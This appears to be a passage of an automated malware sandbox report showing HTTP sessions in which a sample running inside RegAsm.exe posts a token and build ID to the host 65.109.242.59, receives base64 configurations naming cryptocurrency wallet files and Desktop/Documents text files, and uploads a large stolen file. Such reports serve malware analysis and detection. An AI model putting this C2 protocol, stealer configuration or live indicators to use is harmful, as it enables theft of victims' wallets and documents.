                                                                                  2024-05-24 15:47:23 UTC1025OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------HJJJDAEGIDHCBFHJJJEGCont
                                                                                  2024-05-24 15:47:24 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.64973665.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:25 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------JJDHIDBFBFHIJKFHCGIECont
                                                                                  2024-05-24 15:47:25 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:25 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.64973765.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:26 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DAKJDHIEBFIIDGDGDBAECont
                                                                                  2024-05-24 15:47:27 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:27 UTC131INData Raw: 37 38 0d 0a 52 47 56 6d 59 58 56 73 64 48 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 52 38 4e 54 42 38 64 48 4a 31 5a 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 5a 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 55 77 66 47 5a 68 62 48 4e 6c 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 78RGVmYXVsdHwlRE9DVU1FTlRTJVx8Ki50eHR8NTB8dHJ1ZXwqd2luZG93cyp8ZGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDUwfGZhbHNlfCp3aW5kb3dzKnw=0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  20192.168.2.64973865.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:28 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 453
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:28 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------EHIJJDGDHDGDAKFIECFICont
                                                                                  2024-05-24 15:47:29 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.64973965.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:30 UTC280OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AKKEHIECFCAAFIEBGIDA
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 98173
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------AKKEHIECFCAAFIEBGIDAContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------AKKEHIECFCAAFIEBGIDAContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------AKKEHIECFCAAFIEBGIDACont
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 4b 4d 45 39 2b 61 42 69 5a 79 61 4b 55 6e 4a 70 4b 41 44 76 53 65 78 2f 4b 6c 7a 32 48 35 55 6e 38 76 65 67 41 36 55 44 6a 76 53 34 7a 53 59 6f 47 46 4a 6e 50 61 6c 37 2f 7a 6f 46 41 41 66 53 6b 2f 4b 6a 36 30 64 4b 42 69 59 2f 4c 32 6f 50 48 30 70 53 50 2f 41 4e 64 49 52 67 39 71 41 45 39 76 35 55 74 48 61 67 67 34 70 42 63 37 32 69 69 69 6f 50 6c 69 4b 65 61 61 30 73 62 79 39 68 31 47 33 30 36 64 41 74 76 61 7a 33 43 79 73 76 6d 75 63 74 6a 79 30 59 38 49 72 44 70 2f 45 4b 68 75 56 6c 56 39 59 47 6e 61 61 64 61 44 74 62 7a 32 30 4d 54 53 49 6f 74 35 74 78 65 51 41 62 57 77 6a 44 5a 6b 34 43 39 57 46 53 54 36 64 46 4c 47 4c 2b 61 44 64 45 73 6f 68 38 77 34 77 48 78 6e 48 72 30 71 6f 2b 68 61 66 49 78 59 77 41 45 39 53 4b 38 6d 74 68 4b 74 57 72 4b 70 54
                                                                                  Data Ascii: KME9+aBiZyaKUnJpKADvSex/Klz2H5Un8vegA6UDjvS4zSYoGFJnPal7/zoFAAfSk/Kj60dKBiY/L2oPH0pSP/ANdIRg9qAE9v5UtHagg4pBc72iiioPliKeaa0sby9h1G306dAtvaz3Cysvmuctjy0Y8IrDp/EKhuVlV9YGnaadaDtbz20MTSIot5txeQAbWwjDZk4C9WFST6dFLGL+aDdEsoh8w4wHxnHr0qo+hafIxYwAE9SK8mthKtWrKpT
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 65 33 2f 41 4f 71 70 74 5a 30 75 37 76 50 44 65 6a 33 2b 6e 44 64 71 47 6e 4a 46 50 45 6e 39 38 62 52 75 58 38 63 44 38 73 55 76 32 6e 77 33 34 36 30 2b 4e 4c 73 6f 73 38 66 4a 68 64 39 6b 73 4c 64 78 37 6a 39 4b 2b 56 6f 79 69 6f 77 6d 31 64 52 75 6e 31 73 33 65 7a 74 39 33 33 48 36 44 57 6a 4a 79 6e 42 4f 7a 6c 5a 72 70 64 4b 31 31 66 37 2f 41 4c 7a 4b 30 46 70 2f 45 63 6d 71 65 48 4e 64 75 76 74 38 4e 70 49 6a 72 63 51 76 74 33 34 50 51 6b 64 52 2f 77 44 58 39 73 53 36 52 43 6d 6e 2f 77 44 43 5a 36 58 41 4e 74 72 62 72 35 6b 53 66 33 64 38 62 45 6a 39 42 2b 56 61 48 32 6a 77 33 34 47 30 2b 53 4f 30 4b 4e 50 49 63 69 46 48 33 79 7a 4e 32 48 73 50 30 71 4c 53 74 4c 75 37 50 77 78 72 56 2f 71 49 32 33 2b 6f 78 79 7a 79 70 2f 63 47 77 37 56 2f 44 4a 2f 50
                                                                                  Data Ascii: e3/AOqptZ0u7vPDej3+nDdqGnJFPEn98bRuX8cD8sUv2nw3460+NLsos8fJhd9ksLdx7j9K+Voyiowm1dRun1s3ezt933H6DWjJynBOzlZrpdK11f7/ALzK0Fp/EcmqeHNduvt8NpIjrcQvt34PQkdR/wDX9sS6RCmn/wDCZ6XANtrbr5kSf3d8bEj9B+VaH2jw34G0+SO0KNPIciFH3yzN2HsP0qLStLu7PwxrV/qI23+oxyzyp/cGw7V/DJ/P
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 4f 4c 73 77 6f 6f 6f 70 69 43 6b 70 61 54 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 53 55 44 46 70 4b 4b 4b 41 43 69 69 69 67 41 6f 78 53 63 30 55 41 46 46 46 46 41 42 52 52 52 51 41 47 6b 70 54 53 55 44 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 59 42 53 55 74 46 41 78 4b 4b 4b 4b 41 43 6b 6f 6f 6f 41 4b 4b 4b 51 30 44 43 69 69 69 67 42 4b 4b 4b 4b 42 68 52 52 52 51 41 68 6f 70 61 53 6d 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 47 46 4a 52 7a 52 51 41 55 55 55 6c 41 77 70 50 77 70 61 54 6d 67 41 4e 46 4c 54 54 51 41 55 55 55 55 78 68 53 5a 70 61 53 67 41 6f 37 55 55 55 44 45 6f 6f 70 4b 59 77 6f 6f 6f 35 6f 41 4b 53 69 69 6d 4d 4b 53 69 69 67 41 6f 6f 70 44 52 64 41 4b 61 53 6b 7a 52 6d 69 34 77 4e 46 47 61 53 6e 63 59 74 46 4a 53 55 41 4c
                                                                                  Data Ascii: OLswooopiCkpaTFABRRRQAUUUUAFFFFABRRSUDFpKKKACiiigAoxSc0UAFFFFABRRRQAGkpTSUDCiiigAooooAKKKKYBSUtFAxKKKKACkoooAKKKQ0DCiiigBKKKKBhRRRQAhopaSmMKKKKAEooooGFJRzRQAUUUlAwpPwpaTmgANFLTTQAUUUUxhSZpaSgAo7UUUDEoopKYwooo5oAKSiimMKSiigAoopDRdAKaSkzRmi4wNFGaSncYtFJSUAL
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 39 36 35 71 48 45 2b 45 72 31 59 30 6f 78 6c 65 54 53 32 58 58 54 75 64 46 66 68 6a 47 55 4b 55 71 73 70 52 74 46 4e 37 76 70 72 32 4f 51 4e 4a 53 69 69 76 6f 7a 35 77 4b 4b 4b 4b 51 42 52 52 54 5a 50 38 41 56 50 38 41 37 70 71 5a 79 35 59 74 39 69 36 63 65 65 61 6a 33 59 65 5a 48 2f 66 58 38 36 50 4d 6a 2f 76 72 2b 64 65 35 55 56 34 50 39 74 56 50 35 55 66 58 66 36 73 30 76 2b 66 6a 2f 41 38 4e 38 78 43 63 42 31 2f 4f 6e 56 36 35 34 67 68 6a 75 4e 4b 45 4d 71 68 6f 35 4c 6d 33 52 31 50 63 47 5a 41 52 58 6e 76 69 50 77 37 4e 6f 56 78 76 54 64 4a 59 79 48 39 33 49 65 71 48 2b 36 33 39 44 33 72 70 77 75 61 71 72 50 6b 71 4b 31 39 6a 68 78 2b 51 53 6f 55 2f 61 55 58 7a 57 33 58 55 78 61 4b 4b 4b 39 67 2b 63 43 69 69 69 67 41 6f 78 52 52 51 41 68 36 55 55 75
                                                                                  Data Ascii: 965qHE+Er1Y0oxleTS2XXTudFfhjGUKUqspRtFN7vpr2OQNJSiivoz5wKKKKQBRRTZP8AVP8A7pqZy5Yt9i6ceeaj3YeZH/fX86PMj/vr+de5UV4P9tVP5UfXf6s0v+fj/A8N8xCcB1/OnV654ghjuNKEMqho5Lm3R1PcGZARXnviPw7NoVxvTdJYyH93IeqH+639D3rpwuaqrPkqK19jhx+QSoU/aUXzW3XUxaKKK9g+cCiiigAoxRRQAh6UUu
                                                                                  2024-05-24 15:47:30 UTC16355OUTData Raw: 30 55 47 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 70 67 46 46 47 66 61 6b 7a 53 47 4c 2b 4e 4a 53 55 55 77 46 7a 53 45 30 55 55 68 69 55 55 55 55 41 46 46 46 49 61 41 43 69 69 69 67 59 55 6c 46 46 41 42 52 52 53 64 36 42 68 52 52 52 51 41 48 70 53 55 70 70 4b 42 68 53 55 74 49 61 41 43 69 69 67 30 44 45 6f 6f 6f 6f 47 46 4a 52 52 54 41 4b 53 6c 4e 4a 51 4d 4b 53 67 30 55 41 46 4a 53 30 6c 41 42 53 47 6c 70 44 51 4d 4b 53 6c 70 4b 42 68 53 47 6c 70 4b 42 68 51 61 4b 53 6d 41 55 6c 4c 53 55 44 41 39 4b 53 6c 70 4b 42 68 53 55 74 4a 51 41 55 6c 4b 61 53 67 59 6c 46 46 46 41 78 4b 4b 4b 4b 42 69 55 55 55 6c 41 42 53 55 47 69 67 59 55 6c 46 46 41 77 70 4b 4b 44 54 47 4a 53 47 6c 70 4b 42 68 53 55 74 4a 51 4d 4b 53 6c 4e 4a 51 41 6c 46 46
                                                                                  Data Ascii: 0UGgAooooAKKKKACiiigAooopgFFGfakzSGL+NJSUUwFzSE0UUhiUUUUAFFFIaACiiigYUlFFABRRSd6BhRRRQAHpSUppKBhSUtIaACiig0DEooooGFJRRTAKSlNJQMKSg0UAFJS0lABSGlpDQMKSlpKBhSGlpKBhQaKSmAUlLSUDA9KSlpKBhSUtJQAUlKaSgYlFFFAxKKKKBiUUUlABSUGigYUlFFAwpKKDTGJSGlpKBhSUtJQMKSlNJQAlFF
                                                                                  2024-05-24 15:47:30 UTC43OUTData Raw: 76 38 41 30 47 4f 67 44 2f 2f 5a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 48 49 45 43 46 43 41 41 46 49 45 42 47 49 44 41 2d 2d 0d 0a
                                                                                  Data Ascii: v8A0GOgD//Z------AKKEHIECFCAAFIEBGIDA--
                                                                                  2024-05-24 15:47:31 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.64974065.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:32 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----AKKKFBGDHJKFHJJJJDGC
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 44 47 43 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------AKKKFBGDHJKFHJJJJDGCContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------AKKKFBGDHJKFHJJJJDGCCont
                                                                                  2024-05-24 15:47:33 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.64974165.109.242.594434784C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-24 15:47:33 UTC278OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                  Host: 65.109.242.59
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-24 15:47:33 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 32 62 65 64 61 35 35 37 64 31 34 61 64 30 38 32 62 65 31 30 64 35 63 61 35 32 32 63 36 61 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"22beda557d14ad082be10d5ca522c6ac------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DAEBKKKEHDHDGDGCFBKJCont
                                                                                  2024-05-24 15:47:34 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Fri, 24 May 2024 15:47:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-24 15:47:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:11:46:53
                                                                                  Start date:24/05/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x380000
                                                                                  File size:363'520 bytes
                                                                                  MD5 hash:22152460B13E4C2473DC3FCDEA192933
                                                                                  Has elevated privileges:true
